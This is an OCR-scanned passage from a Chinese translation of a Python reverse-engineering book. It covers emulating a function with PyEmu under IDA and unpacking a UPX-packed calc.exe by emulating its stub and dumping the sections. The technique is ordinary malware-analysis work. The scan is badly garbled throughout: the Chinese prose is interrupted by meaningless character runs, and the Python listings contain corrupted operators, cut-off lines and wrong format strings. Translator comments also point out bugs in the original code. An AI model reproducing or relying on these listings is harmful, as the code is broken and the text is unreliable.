的 看 出 ， 整 个 本 数 的 执行 流程 ， 和 参数 的 调用 关系 。 我 们 将 使 用 PyEmu 仿真 整个 
WA, hte 上 面 列 出 的 汇编 代码 ， 同 时 设置 arg_0 Marg 4 为 我 们 需要 的 任何 
数 ， 最 后 retn 返回 的 时 候 ， 捕获 EAX 的 值 ， 也 就 是 函数 的 返回 值 。 虽 然 仿真 的 画 
数 似乎 过 于 简单 ， 不 过 整个 仿真 过 程 就 是 一 切 函 数 仿真 的 基础 ， 一 通 百 通 。 


12.3.1 函数 仿真 
开始 脚本 编写 ， 第 一 步 确认 PyEmu 的 路 径 设 置 正 确 。 


Zaddnum function call.py 

import sys 
sys.path.append("C:\\PyEmu" ) 
sys.path.append("C:\\PyEmu\\1ib" ) 
from PyEmu import * 


置 好 库 路 径 之 后 ， 就 要 开始 画 数 仿真 部 分 的 编写 了 。 首 先 将 我 们 逆向 的 程序 的 ， 
fo SATIS RDN EI ERES 以 便 伪 真 器 仿真 运行 。 因 为 我 们 会 使 用 
IDAPython 加 载 这 些 块 ， 对 相关 函数 不 熟悉 的 同学 ， 请 翻 到 第 十 一 章 ， 认 真 阅 读 。 


Zaddnum function call.py 


emu = IDAPyEmu() 

4 Load the binary's code segment 

code start = SegByName(".text") 

code end - SegEnd( code start ) 

while code start «- code end: 
emu.set memory( code start, GetOriginalByte(code start), size=: 
code start += 1 

print "[*] Finished loading code section into memory." 

# Load the binary's data segment 

data start - SegByName(".data") 

data end - SegEnd( data start ) 

while data start «- data end: 
emu.set memory( data start, GetOriginalByte(data start), size=: 
data start += 1 

print "[*] Finished loading data section into memory." 





使 用 任何 仿真 器 方法 之 前 都 必须 实例 化 一 个 IDAPyEmu 对 象 。 接 着 将 代码 块 和 数 
据 块 加 载 进 PyEmu AF, ZEE xR MA., EA IDAPython 的 
SegByName() 函 数 找 出 块 首 ，SegEnd() 找 出 块 尾 。 然 后 一 个 一 个 字 节 的 将 这 些 块 
中 的 数据 拷贝 到 PyEmu 的 内 存 中 。 代 交 和 数据 大 都 加 或 完成 后 ， 就 要 设置 栈 参 数 
了 ， 这 些 参 数 可 以 任意 设置 ， 最 后 再 安装 一 个 retn 指使 处 理 画 数 。 


Zaddnum function call.py 


4 Set EIP to start executing at the function head 
emu.set register("EIP", 0x00401000) 

# Set up the ret handler 

emu.set mnemonic handler("ret", ret handler) 

# Set the function parameters for the call 
emu.set stack argument(0x8, 0x00000001, name-'arg 0" ) 
emu.set stack argument(Oxc, 0x00000002, name-'arg 4") 
# There are 10 instructions in this function 
emu.execute( steps - 10 ) 

print "[*] Finished function emulation run." 


首先 将 EIP RAZR, 0x00401000, PyEmu 候 真 器 将 从 这 里 开始 执行 指令。 
接着 ， ERAH retn 指令 上 设置 助 记 符 (mnemonic) 或 者 指 合 处理 函数 
(set_instruction_handler)。 第 三 步 ， 设 置 栈 参数 以 供 画 数 调用 。 在 这 里 设置 成 
0x00000001 和 0x00000002。 最 后 让 PyEmu 执行 完成 整个 函数 10 行 代码 。 完 整 
的 代码 如 下 。 


Zaddnum function call.py 
import sys 
sys.path.append("C:\\PyEmu" ) 
sys.path.append("C:\\PyEmu\\1ib" ) 
from PyEmu import * 
def ret_handler(emu, address): 
numi = emu.get stack argument("arg 0" 
num2 = emu.get stack argument("arg 4" 
sum = emu.get register("EAX") 
print "[*] Function took: 96d, %d and the result is %d." % (num: 
return True emu - IDAPyEmu() 
# Load the binary's code segment 
code start = SegByName(".text") 
code end - SegEnd( code start ) 
while code start «- code end: 
emu.set memory( code start, GetOriginalByte(code start), s: 
code start += 1 
print "[*] Finished loading code section into memory." 
# Load the binary's data segment 
data start - SegByName(".data") 
data end - SegEnd( data start ) 
while data start «- data end: 
emu.set memory( data start, GetOriginalByte(data start), s: 
data start += 1 
print "[*] Finished loading data section into memory." 
4 Set EIP to start executing at the function head 
emu.set register("EIP", 0x00401000) 
# Set up the ret handler 
emu.set mnemonic handler("ret", ret handler) 
# Set the function parameters for the call 
emu.set stack argument(0x8, 0x00000001, name-'arg O0") 
emu.set stack argument(Oxc, 0x00000002, name-'arg 4") 
# There are 10 instructions in this function 
emu.execute( steps = 10 ) 
print "[*] Finished function emulation run." 


ese 一 二 ~ 一: 


ret 指令 义理 函 数 简单 的 设置 成 检索 出 栈 参 数 和 EAX 的 值 ， 最 后 再 将 它们 打印 出 
来 。 用 IDA 加 载 addnum.exe， 然 后 将 PyEmu 脚本 当 作 IDAPython 文件 调用 。 输 
出 结果 将 如 下 : 





Finished loading code section into memory. 
Finished loading data section into memory. 
Function took 1, 2 and the result is 3. 
Finished function emulation run. 


TE El SP ESSI 
*ooR 006 0X 
LL LLL. LL. 


Listing 12-2: IDAPyEmu (shea 


很 好 很 简单 ! 整个 过 程 很 成 功 ， 栈 参数 和 返回 值 都 从 捕获 ， 说 明 函 数 仿真 成 功 了 。 
作为 进一步 的 练习 ， 各 位 可 以 加 载 不 同 的 文件 ， 随 机 的 选择 一 个 画 数 进行 仿真 ， 然 
后 监视 相关 数 据 的 调用 或 者 任何 感 兴趣 的 东西 。 某 一 天 ， 当 你 遇 到 一 个 上 千 行 的 沙 
数 的 时 候 ， 相 信 这 种 方 法 能 帮 你 从 无 数 的 分 支 ， 循 环 还 有 可 怕 的 指针 中 拯救 出 来 ， 
它们 节省 的 不 仅仅 是 事件 ， 更 是 你 的 信心 。 接 下 来 让 我 们 用 PEPyEmu 库 解 压 一 个 
被 压缩 文件 。 


12.3.2 PEPyEmu 


PEPyEmu 类 用 于 可 执行 文件 的 静态 分 析 (不 需要 IDA Pro) 。 整 个 处 理 过 程 就 是 
将 磁 衣 上 的 可 执行 文件 映射 到 内 存 中 ， 然 后 使 用 pydasm 进行 指令 解码 。 下 面 的 试 
验 中 ， 我 们 将 通 过 候 真 器 运行 一 个 压缩 过 的 可 执行 文件 ， 然 后 把 解压 出 来 的 原始 文 
件 转 存 到 硬盘 上 。 这 次 使 用 的 压缩 软件 就 是 UPX(Ultimate Packer for 
Executables)， 一 款 伟大 的 开源 压缩 软件 ， 同 时 也 是 使 用 最 广 的 压缩 软件 ， 用 于 最 
大 程度 的 压缩 可 执行 文件 ， 同 样 也 能 被 病毒 软件 用 来 迷惑 分 析 者 。 在 使 用 自 定义 
DE Cody Pierce 提供 ) 对 程序 进行 解压 之 前 ， 让 我 们 看 看 压缩 程序 是 怎 
么 工作 的 。 


12.3.3 压缩 程序 


压缩 程序 由 来 已 久 。 最 早 在 我 们 使 用 1.44 软盘 的 时 候 ， 压 缩 程序 就 用 来 尽 可 能 的 
减少 程序 大 小 ( 想 当 初 我 们 的 软盘 上 可 是 有 上 千 号 文件 )， 随 着 事件 的 流逝 ， 这 项 技 
术 也 渐渐 成 为 病毒 开发 中 的 一 个 主要 部 分 ， 用 来 迷惑 分 析 者 。 一 个 典型 的 压缩 程序 
会 将 目标 程序 的 代码 段 和 数据 段 进行 压 缩 ， 然 后 将 入 口 点 替换 成 解压 的 代码 。 当 程 
序 执行 的 时 候 ， 解 压 代 码 就 会 将 原始 代码 加 压 进 内 存 ， 然 后 跳 到 原始 人 入口 点 
OEP(original entry point )， 开 始 正 常 运行 程序 。 在 我 们 分 析 调 试 任何 压缩 过 的 程 
序 之 前 ， 也 都 必须 解压 它们 。 这 时 候 你 会 想到 用 调试 器 完成 这 项 任务 (因为 各 种 丰 
富 的 脚本 ) ， 不 过 现在 的 病毒 一 般 都 缴 入 反 调试 代码 ， 用 调试 器 进行 解压 变 得 越 来 
越 困难 。 那 怎么 办 呢 ? 用 仿真 器 。 因 为 我 们 并 没有 附加 到 正在 执行 的 程序 ， 而 是 将 
压缩 过 的 代码 拷贝 到 仿真 器 中 运行 ， 然 后 等 待 它 自动 解压 完成 ， 接 着 再 把 解压 出 来 
的 原 始 程序 ， 转 储 到 硬盘 上 。 以 后 就 能 够 正常 的 分 析 调 斌 它们 了 。 


这 次 我 们 选择 UPX 压缩 calc.exe。 然 后 用 PyEmu 解压 它 ， 最 后 dump 出 来 。 记 得 
这 种 方法 同样 适用 于 别 的 压缩 程序 ， 万 变 不 离 其 宗 。 


1. UPX 


UPX 是 自由 的 ， 是 开源 的 ， 是 跨 平 台 的 (Linux Windows.…)。 提供 不 同 的 压缩 级 
别 ， 和 许多 附加 的 选项 ， 用 于 完成 各 种 不 同 的 压缩 任务 。 我 们 使 用 默认 的 压缩 方 


案 ， 都 让 你 可 随意 的 测试 。 
从 http://upx.sourceforge.net 下 载 UPX。 


解压 到 C 盘 ， 官 方 没有 提供 图 形 界面 ， 所 以 我 们 必须 从 命令 行 操 作 。 打 开 CMD, 
eX 变 当前 目录 到 C:\upx303w( 也 就 是 UPX 解压 的 目录 )， 输 入 以 下 命令 : 


C:\upx303w>upx -o c:\calc_upx.exe C:\Windows\system32\calc.exe 
Ultimate Packer for eXecutables 

Copyright (C) 1996 - 2008 

UPX 3.03w Markus Oberhumer, Laszlo Molnar & John Reiser Apr 27th 2( 
File size Ratio Format Name 

114688 -> 56832 49.55% win32/pe calc_upx.exe 

Packed 1 file. C:\upx303w> 


«| = 








成 功 的 压缩 了 Windows 的 计算 器 ， 并 且 转 储 到 了 C & F. 
-0 为 输出 标志 ， 指 定 输出 文件 名 。 接 下 来 ， 终 于 到 了 PEPyEmu 出 马 了 。 
1. 使 用 PEPyEmu 解压 UPX 


压缩 可 执行 程序 的 方法 很 简单 明了 : 重 宇 程 序 的 入口 点 ， 指 向 解压 代码 ， 同 时 
A 加 两 个 而 外 的 块 ，UPX0 和 UPX1。 使 用 Immunity 加 载 压缩 程序 ,检查 内 存 布局 
(ALT-M), 将 会 看 到 如 下 相似 的 输出 : 


Address Size Owner Section Contains Access Initial Access 00100000 
01001000 00019000 calc upx UPXO RWE RWE 

0101A000 00007000 calc upx UPX1 code RWE RWE 

01021000 00007000 calc upx .rsrc data,imports RW RWE 

resources 


4 Ss 
Listing 12-3: UPX 压缩 之 后 的 程序 的 内 存 布 局 . 


UPX1 显示 为 代码 块 ， 其 中 包含 了 主要 的 解压 代码 。 代 码 经 过 UPX1 的 解压 之 后 
就 跳出 UPX1 块 ， 到 达 真 正 的 可 执行 代码 块 ， 开 始 执行 程序 。 我 们 要 做 的 就 是 让 
仿真 器 运行 解压 代码 ， 同 时 不 断 的 检测 EIP 和 JMP， 当 发 现 有 JMP 指令 使 得 EIP 
的 范围 超出 UPX1 段 的 时 候 ， 说 明 将 到 跳 转 到 原始 代码 段 了 。 


接 下 来 开始 代码 的 编写 ， 这 次 我 们 只 使 用 独立 的 PEPyEmu 模块 。 





#upx_unpacker .py 
from ctypes import * 
# You must set your path to pyemu 
sys.path.append("C:\\PyEmu" ) 
sys.path.append("C:\\PyEmu\\1ib" ) 
from PyEmu import PEPyEmu 
# Commandline arguments 
exename = sys.argv[1] 
outputfile = sys.argv[2] 
# Instantiate our emulator object 
emu = PEPyEmu() 
if exename: 

# Load the binary into PyEmu 

if not emu. load(exename) : 

print "[!] Problem loading %s" % exename 
sys.exit(2) 

else: 

print "[!] Blank filename specified" 

sys.exit(3) # Set our library handlers 
emu.set_library_handler("LoadLibraryA", loadlibrary) 
emu.set_library_handler("GetProcAddress", getprocaddress) 
emu.set_library_handler("VirtualProtect", virtualprotect) 
# Set a breakpoint at the real entry point to dump binary 
emu.set_mnemonic_handler( "jmp", jmp_handler ) 
# Execute starting from the header entry point 
emu.execute( start=emu.entry_point ) 


第 一 步 将 压缩 文件 加 载 进 PyEmu。 第 二 部 ， 在 LoadLibraryA， 
GetProcAddress, VirtualProtect 三 个 画 数 上 设置 库 义 理 函 数 。 这 些 函 数 都 将 在 解压 
代码 中 调用 ， 这 些 操作 必须 我 们 自己 在 仿真 器 中 完成 。 第 三 步 ， 在 解压 程序 执行 完 
成 准备 跳 到 OEP 的 时 候 ， 我 们 将 进 行 相关 的 操作 ， 这 个 任务 就 有 JMP 指令 处 理 
本 数 完成 。 最 后 告诉 仿真 器 ， 从 压缩 程序 头 部 开始 执行 代码 。 


#upx_unpacker .py 
from ctypes import * 
# You must set your path to pyemu 
sys.path.append("C:\\PyEmu" ) 
sys.path.append("C:\\PyEmu\\1ib" ) 
from PyEmu import PEPyEmu 
HMODULE WINAPI LoadLibrary( 

in LPCTSTR lpFileName 
E 
def loadlibrary(name, address): 
# Retrieve the DLL name 
dllname - emu.get memory string(emu.get memory(emu.get register("E: 
# Make a real call to LoadLibrary and return the handle 
dllhandle - windll.kernel32.LoadLibraryA(dllname) 
emu.set register("EAX", dllhandle) 


4 Reset the stack and return from the handler 
return address - emu.get memory(emu.get register("ESP")) 
emu.set register("ESP", emu.get register("ESP") + 8) 
emu.set register("EIP", return address) 
return True 
FARPROC WINAPI GetProcAddress( 
in HMODULE hModule, 
in LPCSTR lpProcName 
E. 
def getprocaddress(name, address): 
# Get both arguments, which are a handle and the procedure name 
handle = emu.get memory(emu.get register("ESP") + 4) 
proc name = emu.get memory(emu.get register("ESP") + 8) 
4 lpProcName can be a name or ordinal, if top word is null it': 
4 lpProcName 的 高 16 位 是 null 的 时 候 , 它 就 是 序列 号 (也 就 是 个 地 址 ) , 否 者 ; 
if (proc name >> 16): 
procname = emu.get memory string(emu.get memory(emu.get rer 
else: 
procname = arg2 
# 这 arg2 不 知道 从 何 而 来 , 应 该 是 procname = proc name 
# Add the procedure to the emulator 
emu.os.add library(handle, procname) 
import address - emu.os.get library address(procname) 
# Return the import address 
emu.set register("EAX", import address) 
4 Reset the stack and return from our handler 
return address - emu.get memory(emu.get register("ESP")) 
emu.set register("ESP", emu.get register("ESP") + 8) 
# 这 里 应 该 是 r("ESP") + 8， 因 为 有 两 个 参数 需要 平衡 
emu.set register("EIP", return address) 
return True 
BOOL WINAPI VirtualProtect( 
in LPVOID lpAddress, 
in SIZE T dwSize, 
in DWORD flNewProtect, 
out PDWORD lpflOldProtect 


def virtualprotect(name, address): 
£ Just return TRUE 
emu.set register("EAX", 1) 
# Reset the stack and return from our handler 
return address - emu.get memory(emu.get register("ESP")) 
emu.set register("ESP", emu.get register("ESP") + 16) 
emu.set register("EIP", return address) 
return True 
# When the unpacking routine is finished, handle the JMP to the OEF 
def jmp handler(emu, mnemonic, eip, opi, op2, op3): 
4 The UPX1 section 
if eip < emu.sections["UPX1"]["base"]: 


print "[*] we are jumping out of the unpacking routine." 
print "[*] OEP = 0x%08x" % eip 

# Dump the unpacked binary to disk 

dump. unpacked( emu) 

# We can stop emulating now 

emu.emulating = False 

return True 
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E 4 EB ERR x Fh dp EI FHÉ DLL 的 名 字 ， 然 后 使 用 ctypes E WAH 

真正 的 LoadLibraryA 调用 ， 这 个 函数 由 kernel32.dll 导出 。 调 用 成 功 返 回 后 ， 将 
mas s EAX ZHzszs, BAB hash, mxEEGAMHEBESZORIL Ale, 
GetProcAddress 义理 范 数 从 栈 中 接收 两 个 参数 (arg2)， 然 后 在 仿真 器 中 
进行 真实 的 调用 (emu.os.add library 和 emu.os.get library address), 3X 个 
Eq 2 t EH kernel32.dll 导出 (当然 也 可 以 使 用 
windll.kernel32.GetProcAddress) 。 之 后 把 地 址 存储 到 EAX， 调 整 栈 (这 
里 原作 者 使 用 emu.set register("ESP", emu.get register("ESP") + 8)， 不 过 由 
于 是 两 个 参数 ， 应 该 是 +12)， 返 回 。 第 三 个 VirtualProtect KERZ, RÆ fi 3 Bd 
返回 一 个 True 值 ， 接 着 就 是 一 样 的 栈 人 处理 AMBRE. CA, 2A 
为 我 们 不 需要 真正 的 保 扩 内 存 中 的 某 个 页 面 ; 我 们 值 需要 确保 在 仿真 器 中 的 
he 。 最 后 的 JMP 指使 处 理 画 数 做 了 一 个 简 单 的 确认 ， 看 

否 要 跳出 解压 代码 段 ， 如 果 跳 出 ， 就 调用 dump unpacked 将 代码 转 储 到 硬 & 
上 。 之 后 告诉 仿真 器 停止 工作 ， 解 后 工作 完成 了 。 


下 面 就 是 dump_unpacked 代码 。 


#upx_unpacker .py 


def dump unpacked(emu): 
global outputfile 
fh = open(outputfile, 'wb') 
print "[*] Dumping UPXO Section" 
base = emu.sections["UPXO"]["base"] 
length = emu.sections["UPXO"]["vsize"] 
print "[*] Base: 0x%08x Vsize: %08x"% (base, length) 
for x in range(length): 
fh.write("96c" % emu.get memory(base + x, 1)) 
print "[*] Dumping UPX1 Section" 
base - emu.sections["UPX1"]["base"] 
length = emu.sections["UPX1"]["vsize"] 
print "[*] Base: Ox%08x Vsize: %08x" % (base, length) 
for x in range(length): 
fh.write("96c" % emu.get memory(base + x, 1)) 
print "[*] Finished." 


我 们 只 需要 简单 的 将 UPX0 和 UPX1 两 个 段 的 代码 写 入 文件 。 一 旦 文件 dump 成 
功 ， 就 能 够 想 正 常 程序 一 样 分 析 调 斌 它们 了 。 在 命令 行 中 使 用 我 们 的 解压 脚本 看 
看 : 


:NSC:NMPython25Npython.exe upx unpacker.py C:Ncalc upx.exe calc cl« 
We are jumping out of the unpacking routine. 

OEP - 0x01012475 

Dumping UPXO Section 

Base: 0x01001000 Vsize: 00019000 

Dumping UPX1 Section 


Base: 0x0101a000 Vsize: 00007000 [*] Finished. 


er el ed et C LL A 
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Listing 12-4:upx unpacker.py 的 命令 行 输出 


现在 我 们 有 了 一 个 和 未 加 密 的 calc.exe 一 样 的 calc_clean.exe。 大 功 告 成 ， 各 位 不 
妨 测试 着 写 写 不 同 壳 的 解压 代码 ， 相 信 不 久之 后 你 会 学 到 更 多 。 


